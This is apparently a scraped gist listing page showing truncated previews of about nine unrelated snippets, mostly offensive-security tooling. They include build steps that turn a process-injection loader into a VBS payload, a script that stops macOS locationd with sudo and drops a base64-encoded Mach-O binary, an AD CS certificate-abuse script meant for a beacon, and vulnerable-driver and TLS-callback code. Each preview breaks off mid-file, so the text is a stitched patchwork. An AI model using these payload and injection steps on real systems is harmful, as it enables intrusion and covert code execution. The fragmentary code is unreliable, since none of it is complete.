title | updated | layout | category | prism_languages | intro | |
---|---|---|---|---|---|---|
AppleScript |
2023-04-05 |
2017/sheet |
macOS |
|
AppleScript is a scripting language for automating macOS. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Original script and research by commial | |
### https://github.com/commial/experiments/tree/master/windows-defender | |
### Set LUADec_Path to binary | |
### https://github.com/viruscamp/luadec | |
import struct | |
import argparse | |
import sys | |
import os | |
import io | |
import subprocess |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdio> | |
#include <windows.h> | |
VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved) | |
{ | |
puts("[DynamicLibrary.dll]: TLS Callback"); | |
} | |
#ifdef _WIN64 | |
#pragma comment (linker, "/INCLUDE:_tls_used") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/zsh | |
echo "++ Stopping locationd" | |
sudo launchctl stop com.apple.locationd | |
echo "++ Dropping swiftliverpool" | |
echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/// Using with GadgetToJScript (e.g. for VBS payload): | |
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs | |
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll | |
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs | |
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using System.Threading.Tasks; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <winternl.h> | |
#include <stdio.h> | |
#include <DbgHelp.h> | |
#include "LenovoMemoryMgr.h" | |
#pragma comment(lib, "dbghelp") | |
typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
iOS 16 introduced launch constraints, which can be used to constraint the launch of an application. | |
There are three types of constraints: | |
Self Constraints, which the launched application itself must meet | |
Parent Constraints, which the parent process must meet | |
Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service) | |
Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints. | |
Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch and they can be included in the code signature, in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements). | |
Constraint Categories (from TrustCache, new in version 2): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zlib | |
import io | |
import sys | |
PNG_MAGIC = b"\x89PNG\r\n\x1a\n" | |
def parse_png_chunk(stream): | |
size = int.from_bytes(stream.read(4), "big") | |
ctype = stream.read(4) | |
body = stream.read(size) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-ProcessPipes{ | |
param( | |
[Parameter(Mandatory=$false)] | |
[string]$CSV, | |
[Parameter(Mandatory=$false)] | |
[switch]$All | |
) | |
Add-Type -TypeDefinition @" | |
using System; |
NewerOlder